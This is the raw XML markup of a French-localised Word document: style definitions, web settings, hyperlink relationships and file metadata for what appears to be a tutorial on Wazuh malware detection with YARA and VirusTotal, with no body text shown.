    <w:rsid w:val="00A92921"/>
    <w:rsid w:val="00A97D2F"/>
    <w:rsid w:val="00AA0B2E"/>
    <w:rsid w:val="00AA177B"/>
    <w:rsid w:val="00AA1E25"/>
    <w:rsid w:val="00AA264C"/>
    <w:rsid w:val="00AA64B5"/>
    <w:rsid w:val="00AC1CAE"/>
    <w:rsid w:val="00AC1FE6"/>
    <w:rsid w:val="00AC61CB"/>
    <w:rsid w:val="00AC7473"/>
    <w:rsid w:val="00AD2791"/>
    <w:rsid w:val="00AE4264"/>
    <w:rsid w:val="00B00E59"/>
    <w:rsid w:val="00B17D1E"/>
    <w:rsid w:val="00B67139"/>
    <w:rsid w:val="00B719CC"/>
    <w:rsid w:val="00B80F0C"/>
    <w:rsid w:val="00B86EF0"/>
    <w:rsid w:val="00B9630D"/>
    <w:rsid w:val="00B975D2"/>
    <w:rsid w:val="00BC7E50"/>
    <w:rsid w:val="00BF1E0E"/>
    <w:rsid w:val="00C237A9"/>
    <w:rsid w:val="00C3083B"/>
    <w:rsid w:val="00C463BA"/>
    <w:rsid w:val="00C47210"/>
    <w:rsid w:val="00CA2EEC"/>
    <w:rsid w:val="00CB78F7"/>
    <w:rsid w:val="00CC52BE"/>
    <w:rsid w:val="00D107A3"/>
    <w:rsid w:val="00D43DE3"/>
    <w:rsid w:val="00D44321"/>
    <w:rsid w:val="00D5219D"/>
    <w:rsid w:val="00D57A6E"/>
    <w:rsid w:val="00D8320A"/>
    <w:rsid w:val="00DA5752"/>
    <w:rsid w:val="00DC138E"/>
    <w:rsid w:val="00DC220E"/>
    <w:rsid w:val="00DF4440"/>
    <w:rsid w:val="00E047F3"/>
    <w:rsid w:val="00E07648"/>
    <w:rsid w:val="00E1392C"/>
    <w:rsid w:val="00E42CFF"/>
    <w:rsid w:val="00E64255"/>
    <w:rsid w:val="00E6471E"/>
    <w:rsid w:val="00E86347"/>
    <w:rsid w:val="00E879E9"/>
    <w:rsid w:val="00E9257D"/>
    <w:rsid w:val="00EC2F48"/>
    <w:rsid w:val="00EC65FE"/>
    <w:rsid w:val="00EC7713"/>
    <w:rsid w:val="00ED1197"/>
    <w:rsid w:val="00EE4FDA"/>
    <w:rsid w:val="00F25940"/>
    <w:rsid w:val="00F3336E"/>
    <w:rsid w:val="00F56741"/>
    <w:rsid w:val="00F56897"/>
    <w:rsid w:val="00F6717F"/>
    <w:rsid w:val="00F8013D"/>
    <w:rsid w:val="00F90E0D"/>
    <w:rsid w:val="00F94322"/>
    <w:rsid w:val="00FB07CD"/>
    <w:rsid w:val="00FB2963"/>
    <w:rsid w:val="00FB5F78"/>
    <w:rsid w:val="00FD38AA"/>
    <w:rsid w:val="00FD6D8D"/>
    <w:rsid w:val="00FD6E65"/>
    <w:rsid w:val="00FF0262"/>
    <w:rsid w:val="00FF09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5957"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7013FED7-AC31-40CA-A0D4-21CC4C7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60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D60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D6023"/>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7D6023"/>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D6023"/>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D602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D602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D602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D602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602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D602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D6023"/>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7D6023"/>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D6023"/>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D602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D602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D602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D6023"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitreCar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="007D6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60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D602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D602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D6023"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CitationCar">
    <w:name w:val="Citation Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Citation"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="007D6023"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragraphedeliste">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="007D6023"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Accentuationintense">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="007D6023"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citationintense">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="CitationintenseCar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="007D60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D6023"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Rfrenceintense">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="007D6023"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Grilledutableau">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00F6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67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3276E6"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Mentionnonrsolue">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003276E6"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Tableausimple1">
    <w:name w:val="Plain Table 1"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="41"/>
    <w:rsid w:val="00327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ythonnumbercolor">
    <w:name w:val="pythonnumbercolor"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="006F4E41"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pythonstringcolor">
    <w:name w:val="pythonstringcolor"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="006F4E41"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pythonkeywordcolor">
    <w:name w:val="pythonkeywordcolor"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="006F4E41"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="AdresseHTML"/>
    <w:next w:val="Normal"/>
    <w:link w:val="CodeCar"/>
    <w:rsid w:val="006F4E41"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
      </w:pBdr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="F2F2F2" w:themeColor="background1" w:themeShade="F2"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="AdresseHTML">
    <w:name w:val="HTML Address"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="AdresseHTMLCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F4E41"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AdresseHTMLCar">
    <w:name w:val="Adresse HTML Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="AdresseHTML"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="006F4E41"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeCar">
    <w:name w:val="Code Car"/>
    <w:basedOn w:val="AdresseHTMLCar"/>
    <w:link w:val="Code"/>
    <w:rsid w:val="006F4E41"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="F2F2F2" w:themeColor="background1" w:themeShade="F2"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="no">
    <w:name w:val="no"/>
    <w:link w:val="noCar"/>
    <w:rsid w:val="00AA264C"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="F2F2F2" w:themeColor="background1" w:themeShade="F2"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="noCar">
    <w:name w:val="no Car"/>
    <w:basedOn w:val="CodeCar"/>
    <w:link w:val="no"/>
    <w:rsid w:val="00AA264C"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="F2F2F2" w:themeColor="background1" w:themeShade="F2"/>
      <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PrformatHTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PrformatHTMLCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0045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4521E8"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="fr-FR"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a">
    <w:name w:val="a"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="aCar"/>
    <w:rsid w:val="00AD2791"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aCar">
    <w:name w:val="a Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="a"/>
    <w:rsid w:val="00AD2791"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CoDe0">
    <w:name w:val="CoDe"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="CoDeCar0"/>
    <w:qFormat/>
    <w:rsid w:val="00AD2791"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CoDeCar0">
    <w:name w:val="CoDe Car"/>
    <w:basedOn w:val="aCar"/>
    <w:link w:val="CoDe0"/>
    <w:rsid w:val="00AD2791"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA1E25"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="g">
    <w:name w:val="ͼg"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="004965DC"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="e">
    <w:name w:val="ͼe"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="0049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3818">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="113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90358">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="50489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94257">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1194537589">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1345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985">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="801310479">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2085756273">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="3664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925">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="365447012">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2640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59">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="408428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0532">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1781219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70957">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2033993950">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="72850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489974">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="720909731">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="17330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308">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="104656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azuh.com/blog/detection-with-opensearch-integration/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aka.ms/vs/17/release/vc_redist.x64.exe" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documentation.wazuh.com/current/quickstar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umentation.wazuh.com/current/user-manual/capabilities/malware-detection/fim-yara.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.broadcom.com/group/ecx/my-dashboard"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documentation.wazuh.com/current/user-manual/capabilities/malware-detection/virus-total-integration.html" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github-wiki-see.page/m/wazuh/wazuh-dashboard-plugins/wiki/Legac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documentation.wazuh.com/current/user-manual/reference/ossec-conf/index.html"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entilkiwi/mimikat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seminar\videos" TargetMode="Externa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ython.org/downloads/window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ocumentation.wazuh.com/current/proof-of-concept-guide/detect-remove-malware-virustota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8F5F-7CCE-4DFA-9794-2335F512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9</Pages>
  <Words>7770</Words>
  <Characters>42736</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 bouraoui</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>malek bouraoui</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-06T12:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-14T18:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>